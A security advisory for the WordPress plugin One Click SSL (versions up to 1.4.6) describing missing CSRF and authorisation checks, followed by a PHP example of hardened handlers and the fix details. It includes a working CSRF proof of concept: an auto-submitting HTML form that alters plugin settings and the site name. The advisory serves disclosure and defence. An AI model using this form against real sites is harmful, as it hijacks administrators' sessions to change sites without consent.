One Click SSL <= 1.4.6 - Multiple Issues



Description
The settings page and AJAX methods such as ajax_enable_ssl(), ajax_scan() and so on lack CSRF and authorisation checks. This could allow unauthorised settings changes, as well as calls to the AJAX methods by a low-privileged user.

Additionally, arbitrary site options could be updated because of the way update_option() and update_site_option() are used in the admin() and admin_network() functions.
Proof of Concept
<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin.php?page=one-click-ssl" method="POST">
      <!-- Plugin's Settings -->
      <input type="hidden" name="ocssl_toolsmenu" value="1"/>
      <input type="hidden" name="ocssl_nonsslredirect" value="1"/>
      <!-- WP Options -->
      <input type="hidden" name="blogname" value="Owned"/>
    </form>
  </body>
</html>
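
The checks whose absence the description reports, sketched as a hardened settings and AJAX handler. This is an added example, not the plugin's code or its 1.4.7 fix: the function names, nonce action, nonce field names and hook wiring are hypothetical, and only the option names and the page slug come from the form above.

```php
<?php
// Added example: hypothetical handlers, not the plugin's own code.
const OCSSL_EXAMPLE_NONCE  = 'ocssl_example_save'; // hypothetical nonce action
// Allowlist of options this page may write (names taken from the PoC form).
const OCSSL_EXAMPLE_FIELDS = array( 'ocssl_toolsmenu', 'ocssl_nonsslredirect' );

// Call inside the settings <form> so every legitimate POST carries a nonce.
function ocssl_example_render_nonce() {
    wp_nonce_field( OCSSL_EXAMPLE_NONCE, '_ocssl_nonce' );
}

function ocssl_example_save_settings() {
    $page = isset( $_GET['page'] ) ? $_GET['page'] : '';
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || 'one-click-ssl' !== $page ) {
        return; // not a save request for this settings page
    }
    // Authorisation: only users who may manage options can save.
    // A network settings variant would check 'manage_network_options'
    // and write with update_site_option() instead.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    // CSRF: dies unless the POST carries a valid nonce for this action,
    // which a cross-site auto-submitting form cannot supply.
    check_admin_referer( OCSSL_EXAMPLE_NONCE, '_ocssl_nonce' );

    // Write only allowlisted keys; never iterate over $_POST keys, so an
    // extra field such as 'blogname' is ignored.
    foreach ( OCSSL_EXAMPLE_FIELDS as $key ) {
        update_option( $key, empty( $_POST[ $key ] ) ? 0 : 1 );
    }
}
add_action( 'admin_init', 'ocssl_example_save_settings' );

// AJAX action: same two checks, because wp_ajax_* hooks fire for any
// logged-in user, including subscribers.
function ocssl_example_ajax_scan() {
    check_ajax_referer( OCSSL_EXAMPLE_NONCE, 'security' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }
    wp_send_json_success(); // the real scan logic would run here
}
add_action( 'wp_ajax_ocssl_example_scan', 'ocssl_example_ajax_scan' );
```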

Affects Plugin

fixed in version 1.4.7

References

CVE 2019-15828
URL https://plugins.trac.wordpress.org/changeset/2121510

Classification

Type MULTI

Miscellaneous

Views 3188
Verified Yes
WPVDB ID 9448

Timeline

Publicly Published 2019-07-11 (4 months ago)
Added 2019-07-11 (4 months ago)
Last Updated 2019-08-30 (3 months ago)
